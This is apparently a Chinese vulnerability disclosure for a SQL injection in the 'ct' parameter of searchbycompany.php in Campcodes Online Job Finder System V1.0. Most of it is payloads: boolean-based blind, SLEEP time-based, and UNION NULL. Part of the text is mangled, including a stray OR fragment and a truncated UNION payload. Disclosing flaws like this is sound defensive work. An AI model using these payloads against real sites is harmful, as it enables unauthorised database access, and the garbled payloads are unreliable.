关键信息 漏洞描述 漏洞类型: SQL注入 受影响产品: Campcodes Online Job Finder System V1.0 受影响文件: /eris/searchbycompany.php 版本: V1.0 提交者 提交人: hozz 漏洞细节 参数: ct (GET) 类型: Boolean-based blind 标题: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: SLAIDM29' AND 8749=8749-- iQZq /' OR '/ OR '/'=' OR '/'=' 类型: Time-based blind 标题: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: SLAIDM29' AND (SELECT 6232 FROM (SELECT(SLEEP(5))) jhWv) AND 'Ywls'='Ywls 类型: Error-based 标题: Generic UNION query (NULL) - 15 columns Payload: SLAIDM29') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CURDATE()/*,2,3,4,5,6,7,8,9HTTP请求示例